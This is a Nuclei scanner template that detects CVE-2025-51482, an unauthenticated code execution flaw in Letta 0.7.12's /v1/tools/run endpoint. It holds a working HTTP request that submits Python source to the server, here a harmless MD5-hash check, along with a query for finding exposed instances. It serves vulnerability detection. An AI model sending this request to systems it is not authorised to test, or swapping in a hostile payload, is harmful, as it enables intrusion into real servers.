id: CVE-2025-51482 info: name: Letta Letta 0.7.12 - Remote Code Execution author: RaghavArora14 severity: high description: | Letta 0.7.12 is vulnerable to remote code execution via POST /v1/tools/run in letta.server.rest_api.routers.v1.tools.run_tool_from_source, allowing attackers to execute arbitrary Python and OS commands via crafted tool source code. impact: | Unauthenticated attackers can execute arbitrary Python code through crafted tool source code in the /v1/tools/run endpoint, achieving remote code execution. remediation: | Upgrade Letta to a version later than 0.7.12 that properly validates and sandboxes tool source code execution. reference: - https://www.gecko.security/blog/cve-2025-51482 - https://github.com/letta-ai/letta/pull/2630 - https://github.com/Kai-One001/Letta-CVE-2025-51482-RCE - https://nvd.nist.gov/vuln/detail/CVE-2025-51482 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2025-51482 epss-score: 0.11996 epss-percentile: 0.93905 cwe-id: CWE-94 cpe: cpe:2.3:a:letta:letta:0.7.12:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: letta product: letta fofa-query: title="Letta" tags: cve,cve2025,rce,letta,vkev variables: num: "999999999" http: - raw: - | POST /v1/tools/run HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "name": "nuclei", "args": {}, "json_schema": {"type": "object", "properties": {}}, "source_code": "def nuclei():\n import hashlib\n data='{{num}}'.encode('utf-8')\n return ''+hashlib.md5(data).hexdigest()" } matchers-condition: and matchers: - type: word part: body words: - '{{md5(num)}}' - 'tool_return":' condition: and - type: word part: content_type words: - "application/json" - type: status status: - 200 # digest: 4b0a00483046022100be4f2e4b18daaf8243fdd7c44d33e97afe8056832213a986ee2a76f40325911a022100e8bc432952a9ef044b8788a4cab3a7df8152f428a42dd5fc88bd3583dd4ab631:922c64590222798bb761d5b6d8e72950